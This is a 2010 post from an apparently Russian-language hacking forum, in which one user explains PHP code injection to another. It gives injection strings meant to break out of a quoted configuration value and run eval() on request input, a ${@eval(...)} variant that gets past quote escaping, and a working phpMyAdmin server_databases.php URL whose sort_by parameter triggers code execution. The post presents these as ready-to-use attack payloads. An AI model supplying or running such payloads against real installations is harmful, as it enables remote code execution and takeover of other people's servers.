17.06.2010, 19:45
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от Ctacok
А ты посмотри ^_^
Там кароче бага в чём, надо закрыть ковычку, и дописать свой код, а т.к. ковычка экранируется, нечего не получится. Ну на словах я Лев толстой, а на деле ... простой. Покажу.
И так.
Есть у нас создание конфига, там вписать можно небольшое количество параметров.
Вообще без разницы куда вписывать, но лучше в host.
Если мы пишем хост: localhost, то в конфиге.
А нам же надо закрыть ковычку. Мы пишем значит, localhost'; eval($_GET[c]); //
И получается нечто вроде:
PHP код:
$host = 'localhost\';eval($_GET); //
Э, куда ковычки деются? ПАШКЕЛЛА ПОХЕКАЛ МОЙ ПОСТ!
Сам догадаешься причём там mq ?
Или ты мне хочешь показать особые условия?  Я не вникал в тему, но разве нельзя использовать {}?
Что-то вроде:
PHP код:
<?php
$sting = ${@eval($_REQUEST[c])};
?>
Конечно, если я правильно, и речь идет о pma code exec. У меня спокойно срабатывал такой вариант, ведь там помоему используется preg_replace, второй аргумент которого находится в двойных кавычках, что дает нам право на подстановку иполняемых данных. Опять же, если я правильно въехал.
//upd. Все верно, кавычки там идут лесом, вполне срабатывает такой запрос:
Код:
/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by={${die(phpinfo())}}&sort_order=desc&token=1957
Последний раз редактировалось m0Hze; 17.06.2010 в 19:49..
|
|
|